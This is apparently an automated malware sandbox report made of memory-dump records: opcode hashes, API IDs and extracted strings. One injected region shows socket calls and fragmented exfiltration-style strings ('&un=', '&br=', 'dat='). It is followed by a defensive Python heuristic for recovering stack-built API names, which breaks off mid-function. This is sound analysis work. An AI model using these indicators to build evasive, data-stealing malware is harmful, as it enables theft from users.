                                                    • Opcode ID: 9fb8a524956ddefb1b3da30623f9f98615bd7f5c1e59c590e3bea7dae6641d38
                                                    • Instruction ID: 3345ec8f3718cc8c96e57aab67062182b0c6ba58a7f7401d30685a956222ec33
                                                    • Opcode Fuzzy Hash: 9fb8a524956ddefb1b3da30623f9f98615bd7f5c1e59c590e3bea7dae6641d38
                                                    • Instruction Fuzzy Hash: 53013174A01209AFDB04EFB8D945AAEB7B4FF58300F504059B905EB380DA74DA00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e48aff4a8ca91924419787fce1f76888d06dba46375e1b92545ae4c15eed1890
                                                    • Instruction ID: a00accbdc654b78edd4ba2140a057ce313c08e0ccb3fe81a1eb8232ff4af9981
                                                    • Opcode Fuzzy Hash: e48aff4a8ca91924419787fce1f76888d06dba46375e1b92545ae4c15eed1890
                                                    • Instruction Fuzzy Hash: 0BF06271A01649EFDB14EFA9D846A6EB7F4FF58300F444069EA05EF381E6349900CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 921486be7f602072b5a26c3e09cbcbe35ce5039f2f1b0b6e84aa17cffaa42811
                                                    • Instruction ID: 83cd5aed8add5025cd409391d03693241ece33e840d391c680994cf1c4baa81f
                                                    • Opcode Fuzzy Hash: 921486be7f602072b5a26c3e09cbcbe35ce5039f2f1b0b6e84aa17cffaa42811
                                                    • Instruction Fuzzy Hash: 39F090B29567919EE7B6C7AC8064B267FDCBB0677CF454867DD068F142C6A4D880C250
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1112d131a7b755f04a81594b03bb43e1b9e4c4856cfca857a6cc09b80626649
                                                    • Instruction ID: 67d81306c32f4f94276951191523656b5b5604098a04448b68ccaa4b936a2456
                                                    • Opcode Fuzzy Hash: d1112d131a7b755f04a81594b03bb43e1b9e4c4856cfca857a6cc09b80626649
                                                    • Instruction Fuzzy Hash: EDF0E2AB8129964ADF366F286D002E96BD9F795110F496049D6901F209C839C8A3CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction ID: 0b69569f6ed46c032d2278aa5998f40de414d341546a5bd7cbe38026e50ccac1
                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction Fuzzy Hash: 24E0ED32240A026BE721AE4AEC81B0736A9AFD2724F004079B9001E282CAE6D80887A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ff510bf1f7b98a24c99f099016f059d4e1982a7dd5044eb99067e5f60c2a0f3
                                                    • Instruction ID: eaa49c1d4335d6a53b7e39124b738d9dbc895db178890655bc1cd4f392af6664
                                                    • Opcode Fuzzy Hash: 5ff510bf1f7b98a24c99f099016f059d4e1982a7dd5044eb99067e5f60c2a0f3
                                                    • Instruction Fuzzy Hash: E7F05471E046099FDB14EFB8D946A6E77B8FF58700F508099E905EB3D1EA34D900C754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a566605e128ef4b998f72b5fb9e57cc45aa65d1a055ff0809a9b32fb02b8f7ac
                                                    • Instruction ID: 36e3fc04805cadb1a0097c890ff30fb0af94948b85c916f6187a48b065bd3ac4
                                                    • Opcode Fuzzy Hash: a566605e128ef4b998f72b5fb9e57cc45aa65d1a055ff0809a9b32fb02b8f7ac
                                                    • Instruction Fuzzy Hash: D7F05EB0A0465AABDB14EBA8E906A6E77B8FB54200F540459AA059B3C0EB74D900C798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d49872287143de34871bae9c2913b6af20143879559b9122ff6ad2538c8a5721
                                                    • Instruction ID: d8ff1b96f65dad7c584a41baf4b68196e1320348232c7696c31b4a3a5f443352
                                                    • Opcode Fuzzy Hash: d49872287143de34871bae9c2913b6af20143879559b9122ff6ad2538c8a5721
                                                    • Instruction Fuzzy Hash: 34F0E234A00246EADF829B6CC860F7DBFB1BF5C214F840697DC61AF161E764D802CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98b47f465ed5856eab797672af86e4c66d3c9378377fd8aee70416186eeb6236
                                                    • Instruction ID: 0dfac0c3594e695614d21b6a9f64135071bb5940ee0b6d41b1d9776b4c5e48ae
                                                    • Opcode Fuzzy Hash: 98b47f465ed5856eab797672af86e4c66d3c9378377fd8aee70416186eeb6236
                                                    • Instruction Fuzzy Hash: 7FF08271A0560AABDB04EBA8E946E6E77B8FF59300F500199E916EB3C0EA34D900C754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4f07fbf2a641403850e26a0993e6c73faa985883750faa8b885a576651192cc
                                                    • Instruction ID: 2faf94a653d85f7f3b331687d20a0164315a4ab4324f99cdcac41a9b73a9ee29
                                                    • Opcode Fuzzy Hash: f4f07fbf2a641403850e26a0993e6c73faa985883750faa8b885a576651192cc
                                                    • Instruction Fuzzy Hash: E0F0B4319216858FDB62DB1CC144B1E77EEBB00778F054865E815CF592C728D840C641
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56234be4f3bd1d9099c0aa1985548904da2bd98e7b3f93d870b656374b926582
                                                    • Instruction ID: db0015d2232d236f8ec20e3f4359d476b6309ead587cd3953e80a1d8b6676814
                                                    • Opcode Fuzzy Hash: 56234be4f3bd1d9099c0aa1985548904da2bd98e7b3f93d870b656374b926582
                                                    • Instruction Fuzzy Hash: D0E09272A01422ABD3219E58BC00F66B39DEBF4652F094435EA05DB214D668DD11C7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction ID: e09c023234baf62d4f9394f26a147dfefbce2c9cbfb4206e12a8805dfa48226f
                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction Fuzzy Hash: A1E0D832E41119FBDB2196DDAD05F5ABFACEB94A60F000156FA04DB150D5649D40C3D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 195d9c79a1a2d87aaf1fc328eda5e4d43d873c01f262f0042e43915167d9fe2f
                                                    • Instruction ID: 3fcf89fb8a07408d3116d708fda14b59879d6fc3789320057e45d605dcdb2502
                                                    • Opcode Fuzzy Hash: 195d9c79a1a2d87aaf1fc328eda5e4d43d873c01f262f0042e43915167d9fe2f
                                                    • Instruction Fuzzy Hash: 69E0D8B0505244EFD736D75DD050F1A779CBB51729F19445FE4184F942D631D840C385
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 895bb8901cc6e51cec5cd5834955a0005426b3f1d141dcb4bb8acfc06e3e42a2
                                                    • Instruction ID: 0257de79cdb02e03edf43779b02e8fa87d6edd6c07fb4eb45416f8bb67a9b4d6
                                                    • Opcode Fuzzy Hash: 895bb8901cc6e51cec5cd5834955a0005426b3f1d141dcb4bb8acfc06e3e42a2
                                                    • Instruction Fuzzy Hash: ABF0F278810B02DEDBB2EFA99D01BAC36F8F7A4621F00A12AD1008B288D73444A1CF01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction ID: 8f24f4ef620d4654ef07daf1a587c846b437fde6a35f521d1427cb16ea8f9cc7
                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction Fuzzy Hash: 36E0C232684206BBDB225E88CC00F69BBA6FB947A0F104031FE085FA90C6719C92D6C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d6fb4d6e9990c9136f49588ae9545602fdda9798959aba4349c1560904b3836
                                                    • Instruction ID: f5be45ae6e82ee7f1108370a8f81d3be5c8fa614d766704c5de06e8f8fd3c4e5
                                                    • Opcode Fuzzy Hash: 8d6fb4d6e9990c9136f49588ae9545602fdda9798959aba4349c1560904b3836
                                                    • Instruction Fuzzy Hash: 2DD02E712218819AC72D2B00ED24B33361AF7C8760F34080EFA030F9A4EFB0C8E08788
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dfaab76067960def6633bca43174253034450bad2c56a8ccb885787b43b832ff
                                                    • Instruction ID: 22c818b3cb1ce8378748d38f3506b77e8652663d52c3a349a84b00583bec64a5
                                                    • Opcode Fuzzy Hash: dfaab76067960def6633bca43174253034450bad2c56a8ccb885787b43b832ff
                                                    • Instruction Fuzzy Hash: CED0A77110094296EA2D5B149C94B39265AFBD07C1F38005CF6074E9C0DFA4CCA2E498
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction ID: 0b89212add83c08320d9a0e3d86f2a8995b293666d614140d0bdcef3b2747b38
                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction Fuzzy Hash: 4BE08C31910B819BCF16EF88C690F8EBBF5FB84B00F140014A5085F720C638AC00CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: e10b8b9f6732ef275bbf3e9b0fe08aca556082b89cff20b8cc0d5cba334a6709
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 54D0C235252980CFE6568B1DC958B1977A4BB44A44FC50490E5058B662E668D944CA10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: e1a5f6add711280a24870bf00a95d12330358957704e18c9ef97cbecaef120c3
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: 85D0A9314011829AEB82AB54C23876C3BBAFB22208F582065800B0F852C33A4A0AC681
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: f0879132bb4a21c53125e586a9642e778393b5473a455bab77dd60f047516446
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: EEC08C30280A02ABEB261F60CD11B003BB1BB90B81F8400A06701DE0F0EB78D801EA10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 0e72c6cec6aafd10fd7ab5d2b4efcfd36dab4e279d203b504ed6f588748e75cd
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 8CC01232080248BBCB126E82CC00F067B2AFBA4B60F008011BA080E5608632E970EA84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: f023f62fc550cf9e99bd3f87564158922bc8f2ffe52ec494b2b24ffa7a7585c1
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: DCC08C32080248BBC7126E81DC00F017B29E7A0B60F000021BA040A5608532ECA0D598
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: b75e58440852ae3248857fbd669d07472cd741c0bb27aaa6ae104cc86c41b286
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: C5C08C32080248BBC7126A45DD00F017F29E7A4B60F000021BA040A6618932E861D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: c105e48e87e953b688a47718ee30067ee086c75f33db3f761b04e0c01ee78cd5
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 3DC02B70158440FBD7151F70CD10F187258F740A21F64035473214E4F0E5289C00D100
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 06b8c5fa551a077c61d3a3f437ff508ce1058f51d3ad179cc04cfed4596e8d4c
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: 86C08C701511815BEB2A570CCE20B283A51BB0C64CF88019CEA210D4A2C378A803C208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: db9535ac0dd0fb4966ff1528bb930a537d3fd4a552902c03135694635088337e
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: D7B092353019408FCF66DF18C090B1933E4BB48A40B8400D0E800CBA21D229E8008900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: b09f4e7af4c1d015cc0716987b2ad55cf06c41f4713462b60d3d42cf73385e24
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015CFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015CFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015CFE01
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: getaddrinforecvsetsockopt
                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                    • API String ID: 1564272048-1117930895
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: `
                                                    • API String ID: 823142352-2679148245
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    • Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                                    • Instruction ID: b13ec9eca0359b78d2bf6dcd0752040c4c876aec9eaf519fb33d65b7d825a107
                                                    • Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                                    • Instruction Fuzzy Hash: 19F01D70218B089FD784EF18D484B6AB6E0FB89314F54466DB84ECB248C77585418B53
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                                    • Instruction ID: a60d91b954b7688cae433575c47bff8595170c9c4459d58b7cf1c0971a96834e
                                                    • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                                    • Instruction Fuzzy Hash: 87014470618A0C8FCB94EF5CE448B5477E0FB59314F1541AED90DCB266C774D9818BC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                                    • Instruction ID: 97a2a28ae9eacca38f1a0bf02fb2d4d85246d53ec96c8e8836d74b581d82db35
                                                    • Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                                    • Instruction Fuzzy Hash: C8017170A18A0C8FCB94EF4CD488B54B7E0FB59315F1641AED90DDB22AC774D9818BC1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                                    • Instruction ID: 93d96eb6e026bf3cc9a3107a182ca2821e117666a1d9584e3457e30c045b0931
                                                    • Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                                    • Instruction Fuzzy Hash: BA012570618A0C8FDBD4EF1CD448B2577E0FB58314F1645AED95DCB266C670D881CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                                    • Instruction ID: b66be4cbd4eb155af77009ec54955d6fbcf2b1b88fc6a40d7120ed0e6bb7fdea
                                                    • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                                    • Instruction Fuzzy Hash: B201447061860C8FCB84EF1CD448B54BBE0FB59314F1545AED95DCB266D7B0D981CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.918687274.0000000004DE0000.00000040.00000001.sdmp, Offset: 04DE0000, based on PE: false
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                                    • Instruction ID: 76bfcd0451520d99345faf00e9eb50930373598ac6ec5cb7c6a7386805be79fd
                                                    • Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                                    • Instruction Fuzzy Hash: 04018F30618B088FCB84EF1CD448B54BBE0FB59314F1A45AED85ECB226D7B0D981CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
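The String ID fields of the Winsock entries above ("clos$esoc$ket", "conn$ect", "sock") show the API name present in the dump only as dword-sized pieces: the full name is assembled on the stack at run time, so a plain strings scan never sees "closesocket". The following script is an added example and not part of the Joe Sandbox report or of the sample's own code. It assumes the two instruction forms commonly used for such stack strings (`push imm32` and `mov dword [esp+disp8], imm32`), joins runs of printable immediates in memory order and flags the names they spell; `KNOWN_APIS` and the sample bytes are constructed for the demonstration, not taken from the analysed process.

```python
"""Recover stack-built API names from raw x86 code.

Added example, not part of the Joe Sandbox report. Assumption: the name
pieces are written with `push imm32` or `mov dword [esp+disp8], imm32`.
This is a byte-pattern heuristic, not a disassembler.
"""
import re
from typing import List, Optional

# Names worth flagging; this list is ours, extend to taste.
KNOWN_APIS = {"closesocket", "connect", "send", "socket", "recv", "WSAStartup"}

# 68 imm32              push imm32
# C7 44 24 disp8 imm32  mov dword [esp+disp8], imm32
FRAG_RE = re.compile(rb"\x68(?P<push>.{4})|\xc7\x44\x24.(?P<mov>.{4})", re.DOTALL)


def _fragment(imm: bytes) -> Optional[str]:
    """ASCII text of a dword immediate if it looks like a string piece."""
    text = imm.rstrip(b"\x00")          # a short piece is NUL padded on the right
    if not text or any(b < 0x20 or b > 0x7E for b in text):
        return None
    return text.decode("ascii")


def recover_stack_strings(code: bytes) -> List[str]:
    """Return candidate strings built from adjacent immediate stores."""
    results: List[str] = []
    run = []                              # (kind, disp, fragment) of one string
    last_end = None

    def flush() -> None:
        if not run:
            return
        if run[0][0] == "push":
            # push grows the stack downwards: the first pushed dword is the
            # tail of the string, so code order is the reverse of memory order
            pieces = [f for _, _, f in reversed(run)]
        else:
            pieces = [f for _, d, f in sorted(run, key=lambda r: r[1])]
        results.append("".join(pieces))
        run.clear()

    for m in FRAG_RE.finditer(code):
        kind = "push" if m.group("push") is not None else "mov"
        frag = _fragment(m.group(kind))
        disp = code[m.start() + 3] if kind == "mov" else 0
        contiguous = bool(run) and last_end == m.start() and run[-1][0] == kind
        # a gap, a different instruction form, a non-string immediate, or (in
        # push order) a NUL-padded piece all start a new string
        if frag is None or not contiguous or (kind == "push" and len(frag) < 4):
            flush()
        if frag is not None:
            run.append((kind, disp, frag))
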